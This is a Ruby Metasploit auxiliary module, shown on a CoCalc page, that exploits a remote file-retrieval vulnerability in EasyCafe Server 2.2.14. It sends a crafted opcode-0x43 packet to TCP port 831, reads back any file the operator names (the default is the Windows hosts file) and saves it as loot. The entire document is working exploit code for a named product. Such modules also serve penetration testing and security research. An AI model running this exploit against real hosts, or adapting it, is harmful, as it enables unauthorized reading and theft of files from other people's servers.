CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::Tcp
8
  include Msf::Auxiliary::Report
9
  include Msf::Auxiliary::Scanner
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'        => 'EasyCafe Server Remote File Access',
14
      'Description' => %q{
15
          This module exploits a file retrieval vulnerability in
16
        EasyCafe Server. The vulnerability can be triggered by
17
        sending a specially crafted packet (opcode 0x43) to the
18
        831/TCP port.
19
        This module has been successfully tested on EasyCafe Server
20
        version 2.2.14 (Trial mode and Demo mode) on Windows XP SP3
21
        and Windows 7 SP1.
22
        Note that the server will throw a popup messagebox if the
23
        specified file does not exist.
24
      },
25
      'License'     => MSF_LICENSE,
26
      'Author'      =>
27
        [
28
          'R-73eN', # Vulnerability Discovery
29
          'bcoles' # Metasploit module
30
        ],
31
      'References'  =>
32
        [
33
          [ 'EDB', '39102' ]
34
        ]
35
    ))
36

37
    register_options(
38
      [
39
        Opt::RPORT(831),
40
        OptString.new('FILEPATH', [true, 'The path of the file to download', 'C:\\WINDOWS\\system32\\drivers\\etc\\hosts'])
41
      ])
42
  end
43

44
  def get_file
45
    res = sock.get_once
46
    unless res
47
      print_error("Unable to retrieve file due to a timeout.")
48
      return
49
    end
50

51
    unless res.length == 261
52
      print_error("Received a response of an invalid size.")
53
      return
54
    end
55

56
    file_size = res.unpack('@256V')[0]
57
    contents = ''
58
    while contents.length < file_size
59
      contents << sock.get_once
60
    end
61

62
    print_good("File retrieved successfully (#{contents.length} bytes)!")
63
    contents
64
  end
65

66
  def run_host(ip)
67
    file_path = datastore['FILEPATH']
68
    if file_path.length > 67
69
      print_error("File path is longer than 67 characters. Try using MS-DOS 8.3 short file names.")
70
      return
71
    end
72

73
    packet = "\x43"
74
    packet << file_path
75
    packet << "\x00" * (255 - file_path.length)
76
    packet << "\x01\x00\x00\x00\x01"
77

78
    vprint_status("Sending request (#{packet.length} bytes)")
79
    connect
80
    sock.put(packet)
81

82
    contents = get_file
83
    disconnect
84
    return if contents.nil?
85

86
    path = store_loot(
87
      'easycafe_server',
88
      'application/octet-stream',
89
      ip,
90
      contents,
91
      File.basename(file_path)
92
    )
93
    print_status("File saved in: #{path}")
94
  end
95
end
96

97